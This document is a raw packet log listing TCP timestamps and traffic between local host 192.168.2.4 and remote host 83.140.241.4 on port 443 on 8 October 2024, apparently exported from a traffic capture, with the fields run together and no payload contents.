                                                                          Oct 8, 2024 14:12:03.231178045 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.232158899 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.232177019 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.232243061 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.232248068 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.232290983 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.233232021 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.233247042 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.233304977 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.233315945 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.233357906 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.235297918 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.235313892 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.235367060 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.235394955 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.235430956 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.235937119 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.235953093 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.236004114 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.236012936 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.236048937 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.236922979 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.236941099 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.236991882 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.237001896 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.237015009 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.237042904 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.238370895 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.238389969 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.238445997 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.238451004 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.238491058 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.239228010 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.239245892 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.239300013 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.239305973 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.239343882 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.240133047 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.240149021 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.240212917 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.240217924 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.240263939 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.241044998 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.241060972 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.241112947 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.241117954 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.241159916 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.242111921 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.242127895 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.242172003 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.242177010 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.242207050 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.242218971 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.242866993 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.242882013 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.242943048 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.242948055 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.242993116 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.243726969 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.243741989 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.243799925 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.243804932 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.243843079 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.244998932 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.245016098 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.245064974 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.245069981 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.245110035 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.245780945 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.245798111 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.245845079 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.245850086 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.245889902 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.246560097 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.246587038 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.246640921 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.246645927 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.246687889 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.247657061 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.247674942 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.247719049 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.247724056 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.247751951 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.247759104 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.248677015 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.248693943 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.248744965 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.248749971 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.248789072 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.248828888 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.248842955 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.248897076 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.248900890 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.248939037 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.249979019 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.249998093 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.250041008 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.250046015 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.250062943 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.250077963 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.251014948 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.251032114 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.251081944 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.251085997 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.251130104 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.251777887 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.251796961 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.251838923 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.251842976 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.251866102 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.251873970 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.252861023 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.252880096 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.252932072 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.252937078 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.252974987 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.253062963 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.253078938 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.253118038 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.253122091 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.253146887 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.253154993 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.254015923 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.254033089 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.254077911 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.254082918 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.254117966 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.254925966 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.254941940 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.254993916 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.254997969 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.255040884 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.255866051 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.255882978 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.255934954 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.255939960 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.255976915 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.256588936 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.256603956 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.256675005 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.256680012 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.256724119 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.256891012 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.256908894 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.256952047 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.256957054 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.257002115 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.257811069 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.257826090 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.257878065 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.257883072 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.257921934 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.258569956 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.258589983 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.258642912 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.258647919 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.258690119 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.259376049 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.259397984 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.259449005 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.259454012 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.259495020 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.259780884 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.259794950 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.259834051 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.259839058 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.259865999 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.259871960 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.260330915 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.260344982 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.260406017 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.260411978 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.260449886 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.260934114 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.260951042 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.260987997 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.260993004 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.261018038 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.261030912 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.261894941 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.261909962 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.261950970 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.261965990 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.261974096 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.261991978 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.262011051 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.262037039 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.262922049 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.262936115 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.262978077 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.262983084 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.263010979 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.263863087 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.263880968 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.263928890 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.263933897 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.263943911 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.263956070 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.263981104 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.263987064 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.264009953 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.271780014 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.271811008 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.271856070 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.271888018 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.271905899 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.307498932 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.321871996 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.321897984 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.321989059 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.322015047 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.322052002 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.341120958 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.341139078 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.341206074 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.341238022 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.341253042 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.341280937 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.343375921 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.343400002 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.343439102 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.343447924 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.343460083 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.343492985 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.343996048 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.344017029 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.344058990 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.344072104 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.344083071 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.344110966 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.344827890 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.344850063 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.344896078 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.344901085 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.344939947 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.345151901 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.345355988 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.345374107 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.345438957 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.345444918 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.345488071 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.346128941 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.346144915 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.346204996 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.346211910 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.346251965 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.359771013 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.359786987 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.359843016 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.359857082 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.359903097 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.409698009 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.409718990 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.409784079 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.409811020 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.409864902 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.428693056 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.428714991 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.428781033 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.428811073 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.428824902 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.428852081 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.431045055 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.431066036 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.431121111 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.431128979 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.431168079 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.431749105 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.431765079 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.431818008 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.431823969 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.431863070 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.432307005 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.432322025 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.432382107 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.432389021 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.432426929 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.433031082 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.433048010 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.433082104 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.433088064 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.433115005 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.433123112 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.434346914 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.434365034 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.434413910 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.434420109 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.434459925 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.447102070 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.447118998 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.447174072 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.447181940 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.447221041 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.497162104 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.497179985 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.497260094 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.497287989 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.497333050 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.516217947 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.516238928 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.516310930 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.516330004 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.516370058 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.519145966 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.519162893 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.519217014 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.519222975 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.519248009 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.519259930 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.523652077 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.523674965 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.523722887 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.523729086 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.523746967 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.523766041 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.524197102 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.524215937 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.524260998 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.524266005 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.524291039 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.524349928 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.524595022 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.524615049 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.524660110 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.524665117 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.524702072 CEST49730443192.168.2.483.140.241.4
                                                                          Oct 8, 2024 14:12:03.528126955 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.528148890 CEST4434973083.140.241.4192.168.2.4
                                                                          Oct 8, 2024 14:12:03.528203011 CEST49730443192.168.2.483.140.241.4
